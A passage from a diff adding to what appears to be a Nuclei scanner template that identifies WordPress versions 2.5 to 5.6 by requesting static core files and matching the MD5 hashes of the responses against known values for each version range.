"(\"4791431c439486258873301436af176c\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"1d85acc27d25696f9a998f1fe0cb6a79\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.9.2 + dsl: + - "(\"3e3fbecb5bc1fa258a22a6f9a2a534b1\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"9abcfc44be1c15b96453f8b62a5ababf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/content.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"03873ff71f4269941d491b480cb10da0\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"9bb2cfc47606f21365635bc442a7f3d3\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e98feb35e99a6a9f541b2a514079d273\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f42ae068f516911a342284a304411ddb\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"093b2eb2cfc16ba89eebd4869a6d34fe\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"7b4403e4f46a59266dade554f52a4098\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"52d9608bb02c9d6b3201aa5158537156\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"a1b36551d8a606622d8fa44f42850ec7\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.7.1 + dsl: + - "(\"d231e3407c803b11605532828641b0df\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"ebd8fd56a3afb904d89ce735a8aba65b\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"4e054c57589e78fc6b64c25583536967\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/ui.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"03ae09e5c5f80f0ed0fc1ebb9c2053f0\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"642e4f5b08ac1ccc1f1d6d956171ee34\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"720a1323be729253347e733580622e36\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"79352a602390ae6d4e3bf6f9c2494173\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"95f5bbc6ea992fcb641f0275025dc438\" == md5(body))" + - type: dsl + name: 2.5.1 - 2.6.5 + dsl: + - "(\"baddea3389c84a37f2356e47d168d559\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"c11ec4198ab67a1baa9e2d8f515a8629\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"af38b0cc9a19f25f95f8776568549442\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"5a48c21bde270739664e9dab7c1143ad\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c483637b2a5e889bed54a3891035f6e6\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"7b21b4f0a4aaaa3b307727482ac73533\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"b9db394d414b1d2f0d8930522e676c5d\" == md5(body))" + - type: dsl + name: 2.5.1 - 2.6.5 + dsl: + - "(\"cfcfd4436b87fbfd59b1d1fb2196f25b\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"7778e41dc9384c147e4e1bd44adafa1c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/link.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"316da7ee59e094228df2a4fb7e39cfa6\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"b9afd9f4addc771dd657b10e003ab3fd\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"9f192e4711b35b2fae293ce5d8a1c59e\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"85e3d12f288b9ead43fd6f4e3b341815\" == md5(body))" + - type: dsl + name: 2.5.1 - 2.7.1 + dsl: + - "(\"e4eaaa5fcee50264e9b24370cc802b76\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"19c6f3118728c38eb7779aab4847d2d9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"4de9f6b1aafe968e8509ffe7ee9bc973\" == md5(body))" + - type: dsl + name: 3.7.1 - 3.7.35 + dsl: + - "(\"5d01c0e812cdcd6356b78ee0cb4e5426\" == md5(body))" + - type: dsl + name: 3.5 - 3.7 + dsl: + - "(\"653d4dc2d7c3dbdd9ad409ae3f4c4817\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"23acb7d19b52e8fafaa84c3a342cfe7c\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"8bd9069b943e4433737689d9f59eee16\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editimage.html" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"216788f7dbe172a3d3fb827a05d0f837\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"ff7bbb3f7519ab7cc2a9f7fb2a39ea33\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"bc3a66e8d3e0de62ab83d95bd04f4dae\" == md5(body))" + - type: dsl + name: 3.0 - 3.3.3 + dsl: + - "(\"fdea6dce525ebe71c247690f67d32911\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"60340807d945876ff6da82338c84153a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e3b3cebf6d65898314f822f8b8aa90b5\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"568910cba72f8a00a7e9de70bcc62c92\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"f325a73e1da24a2dc91c8ee18199bb02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"decdce43a5ea753c53801b436614249e\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"0a25f1ee5635ea5c98d12fe6a25124dd\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"b7f2ab839344415015809824e6d1ee27\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"7f739de8ea534faec85258212637313c\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"bf5b713b40828ed678cf3b907c88b3cc\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.9.2 + dsl: + - "(\"bb5ecafedc219aac400807dc283fe273\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"d4866567bb43a5f946d15a560629f063\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/window.css" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"db6490f7f7b6a4e9470eab0856c3122a\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"55f7ce40bd02fc916fc8e2614993d5c5\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"880cfaeb6fd12075583b7bc2781f3d36\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"0fb7cbeaf364b4377fb3126384482aec\" == md5(body))" + - type: dsl + name: 2.5.1 - 2.7.1 + dsl: + - "(\"840e1dcc6263a489e4851a1c7371d48b\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"3008a345f351badd78a6d1ace150c901\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0ac5f6185d70a460e207752d2bafa974\" == md5(body))" + - type: dsl + name: 3.6.1 - 3.7.35 + dsl: + - "(\"a7d139d6d9506e005e7aee90d5c7918b\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"065e5a8b0d8875768f0b75fc1bf7b6f0\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ccf5e6012c894a387d6e04300e6d60ed\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e7a339f2c4da85d8c8fa69173d06012a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/wp-tinymce-schema.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"dcb60a584dfa0b64a31c1ee0b67595cf\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"50f4d4fdb09d43ec39f1d730fd398dd1\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"cb88e8f50b53365fb94422e9a269226a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/fonts/dashicons.woff" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"0c1c1ad41c025f72592bca820e073bec\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"a880efb5c3ff8d61a495354352f81afb\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"78f5e202fde4da61a50d49b27e747eb2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"20ae16de66f71648336c8b34f8dce20b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f53d2bfd11506f77d1f6cfebe4435c1d\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"c7452d909c0fad4f568191fc5e5c77f5\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"088ab6f8565d3a0bcc6bee7a64fee658\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/thickbox.js" + matchers: + - type: dsl + name: 4.6 - 5.6 + dsl: + - "(\"d5d248a8730754587b4224c2d9ad36c7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"9fe76355c7009a4dccb10bd3e9347775\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"0d7cfe98065dd12946153ed0987fcc44\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"20baaf5da31ddd92caab7962d15c0ac3\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"b4ba824311d86552ddc7fe7753ef8925\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"482a8efb7c72fbecfa29a509121ea263\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f60e0a316f95a2f31df204a9cef6fe28\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"43e846c82d0eb2e54e55f9bd5b0cd4dd\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ee978eee2af4a9d56478d4d953c33731\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"e0bb5a88a4b79d0b41e6dfdca1952fa2\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"e545ca18aef12843121c32a1fee44d78\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"254033275c930248aec4603d0a5af004\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"1d8b106fccf7ad647ecfc6cd0d77d304\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"4988c924f8df0898cabbca27c2dc57ef\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"bf6afa6da821fca17b1d36692adb88d6\" == md5(body))" + - type: dsl + name: 2.5 - 2.7 + dsl: + - "(\"e9af66a7ac48c57e85fb3148e2d5951d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/swfupload.swf" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"bd5a25f23589652ca472d41fe1484f0c\" == md5(body))" + - type: dsl + name: 3.5.2 + dsl: + - "(\"3dc9c7e7c13b2d4edc3ebb7d0e9cdb94\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5.1 + dsl: + - "(\"c0e5c70af799aeb906b1bef3b11e9a8d\" == md5(body))" + - type: dsl + name: 2.8 - 3.3.1 + dsl: + - "(\"3a1c6cc728dddc258091a601f28a9c12\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"758c0891789a68b465da91f9034a3ec0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/flashmediaelement.swf" + matchers: + - type: dsl + name: 4.6 - 4.8.4 + dsl: + - "(\"2efe1fabfea04432f090ecb3153b10a1\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.5.12 + dsl: + - "(\"e61c004611ce5cc855a3b2ab3e89602d\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.1 + dsl: + - "(\"42c6680f8035fc10855ee2e559c9cc78\" == md5(body))" + - type: dsl + name: 4.3.4 - 4.3.14 + dsl: + - "(\"079d5276459e0e3526afbdb7e1017037\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.3 + dsl: + - "(\"2400c991b8473d44a7edc75605496760\" == md5(body))" + - type: dsl + name: 4.2.8 - 4.2.18 + dsl: + - "(\"bed216acd6fb5318c139087a0a9d6b4d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.7 + dsl: + - "(\"a77bd46c3904a70f0e4ed6f3f714099a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.21 + dsl: + - "(\"e78dcab5e8dc6bfad93588602a065c8a\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.21 + dsl: + - "(\"7325701f91d0eaa11ec0cc9a6087053f\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"582ba00d7a38795bba1306b30c31a6f1\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.22 + dsl: + - "(\"f82e1f904e12a82ac15c63999427c909\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.24 + dsl: + - "(\"03dc1336e5697e4ceda3a7f4b99b71c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f47fbcac042fc512f98220d3eabdc8d5\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"de05e92e39dd7c54887e9aff05928ae2\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"ebe1a8076493805aa48fc343dd86ddb8\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f0ac357ef35636742935d34c076a805e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"c78872a5c45c167f9047cf133b1a254d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"434c0fa5ab62607cf4bf1fc05df759b6\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"3ea0570bc9a465ca82c8c8b2bb4f6905\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"7f2b2879d22aa540d113a4af70999990\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"551a3e9dcf9854a5c5fcaafe716c6202\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"e8997a81c564cf87fdb0d28cee7bdcf1\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"c58284f84f50ed17208769e38fd98a96\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"098fcc8fa903f68d4827a80b19ed8624\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"13e9d45958d1edffdc8eb1942f9473a0\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"5f405904ac0da0f8af0af4d401915af0\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"1f790c5cfc12b650992c164051a09629\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/charmap/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"139897943cd17cda7942e1dc94011aca\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"b450e5710839230572adc66772782a89\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"d995aeaef8197c23cb1e14e3a479bc00\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"1517fb34539b42af182b5e95d9580a1e\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"8a7931011935fc826805265b3228c616\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"a3a422577ac81c9ef6d7036869c30c7b\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"b4f29c072885c987beb19599798babb3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"61d3e5d077b1d76704eac85c63a148bc\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"6bf9e5219c34728a89e1e0a987e615d0\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"0fa5d493729a82436d20c26acb7fcbca\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"15acd8a331dbf71d226342b71258b015\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"4c3c81756533d703d3bb95ce8f9882a6\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"9bb2e1a85cf507d3355ec0cc0bf9b518\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-views.js" + matchers: + - type: dsl + name: 4.7.3 - 4.8.15 + dsl: + - "(\"122b154b05f13396529c049c1a17d8d1\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.2 + dsl: + - "(\"5abea7b6d9a2556fb8cbfcd3f8d1c0ff\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"fab2f195182995d82502a8ab7f0c79d9\" == md5(body))" + - type: dsl + name: 3.9.1 - 4.2.29 + dsl: + - "(\"ad923bbd7a9caf098f594d0e912379c8\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"0aeeca504e00db4a8bef755c7a85a4fa\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"1e619b769bf8f798e13112e221949e02\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"22729b3c60a2f3c416c5f944cd01e285\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-audiovideo.min.js" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"f093100d539f03b5d1d31f1e74029b44\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.19 + dsl: + - "(\"aedd794ce915a1b424abcfa487a27876\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.24 + dsl: + - "(\"adff9c3836284891ee9c5f4eacc4c708\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"41ee8d23e04975b16e3fb8d8e949b958\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"ca890daf69ca1fa4112ed913a3a5afcb\" == md5(body))" + - type: dsl + name: 4.0 - 4.1 + dsl: + - "(\"15412686f8145bd551c34f16b2a760a2\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"1f89aaa0c6869d92c26386d3fdf3a394\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"6c9436bcb7fab07b86de4e469279eb22\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"12489a4a2667144f42dc607e77a2c2f6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"454d6c7240151c150a4d52a169cf5ff7\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"c3fd752894ae74b3f9f1b443b30c813d\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"7ccdb368b0e1d219ce7552fd266db94e\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"881779f4a5a994adc3767d405ec5cb0e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2c17fb7873f73e7f6a19d201a35cb9ae\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"de96972a78218f779e8113fca52ab704\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-audiovideo.js" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"f256503caa6bc23b44c82e3f46b6b23b\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.19 + dsl: + - "(\"17236090dcb388dd84b091ae7e373ae4\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.24 + dsl: + - "(\"f46820fc85dbf7cb188fa00f5e86eb83\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"197572f6fff30edee0fdc406462726d8\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"7adbf03fa2ee150196ec223a7470cbf0\" == md5(body))" + - type: dsl + name: 4.0 - 4.1 + dsl: + - "(\"7825ea43bee309c4445058686b673caf\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"2609a8c949595ad5dfa6bece456265ff\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"b6e377d5177058bc872fd72c625df119\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"9cebbb22b93c5354519ee9a29b60e902\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4879c39c078d74b588260e5c73e9d141\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"c75f0993477d7c824f929b5c3d788ea8\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"552b12e63a3129de9a94e41889962139\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"ea6650e32a7bc1986c28750f2e4aca6b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"54d8075995b61d4ddae11c67e8ff0667\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"c31fd0b6ddd2e9fb0c741aa693d4dfe8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/custom-html-widgets.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"551cd10292d57f7a63b336d372dd63e7\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"91ded92347b6cc64e9724408d9defa09\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"23ec4608b1a4efda2c3c52c1b945836a\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.2.9 + dsl: + - "(\"feff6bb5c7894507ea30bd0cd7648439\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d3810da7cecafa8ef492ef7760efdbc2\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"da10249779e84eb738fb4f95395f4a15\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-views.min.js" + matchers: + - type: dsl + name: 4.7.3 - 5.2.9 + dsl: + - "(\"000d91b0de96556e03c3053f728b2987\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.2 + dsl: + - "(\"c5f0abb73e687faebc9bf225a1e0824e\" == md5(body))" + - type: dsl + name: 3.9.1 - 4.4.24 + dsl: + - "(\"05b8ea5fb11adb182563ddb989e091d1\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"83c37717273f92513d2f93ca28931fe4\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"169588faa7a29c0efa54e3caadadc3bf\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"1a660eba3ebcb7a4628726cbe7379066\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview-nav-menus.min.js" + matchers: + - type: dsl + name: 4.7.1 - 5.2.9 + dsl: + - "(\"526952e7a87a339b276f5dcfc96c5176\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"4f1fc16aa63323570bfde1539ec30245\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"53d806ed3ac6a8a1d318f4b30e6710a5\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"491a7743fca230e82b84982a8ff59418\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"696de30f3cf4547a2aaa8fe0e952b6d1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"310df817c0cfdfd6fd874c0f8d815714\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"11a79ea66a6057723dcb30218375f194\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-selective-refresh.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"baee98ea647db53f68e17624fe74142b\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"3fd4dd5652ec927a08af04d6ee78b931\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"9f99120370b704e6c7d40f9a5705e823\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"1969be970d4928a749df77e59b27c788\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"2abe93f2d7a83cf5707e9d09c8666de7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"348d0fec979d6f8669f9e771d870b820\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"3b1646e8a61a8a2e8001c3d9cc85883b\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.2.9 + dsl: + - "(\"aefff2962b2f3da789019ca890e97f83\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"fcac029c576eba52ee643630959205b8\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"3400ae02caacb104f1ee4c26adfa86bc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-models.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"e715ea6806c9fdb94aa4d56812dd0217\" == md5(body))" + - type: dsl + name: 3.9.1 - 4.5.23 + dsl: + - "(\"4f4b04852e86713b9f7490e74ee8820a\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"aa94f4d4ff1df18548142ad13d427ca5\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"1f1c22726066146cbe889da7288dd45b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"bba23cbc9478a251a816c14aa4074ec0\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"c2fc10cb436eb00cdaf8b1ef9a6189f2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mce-view.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"33ee9226013e0103d805385f03ebd1eb\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"27da44a32d58d85456db41abc06bedd6\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"602fc8936631c7079b786cbbac621dd8\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.5 + dsl: + - "(\"8e41e6dfd2bc21ec39bd995451083e3b\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"26a64b5857f1fa98167856ac39b0a268\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"fae23eefe8da67b53ebae7fe69c5a3d8\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"8f1af3af83b1bc0ef7aecef9e5cc321d\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.9 + 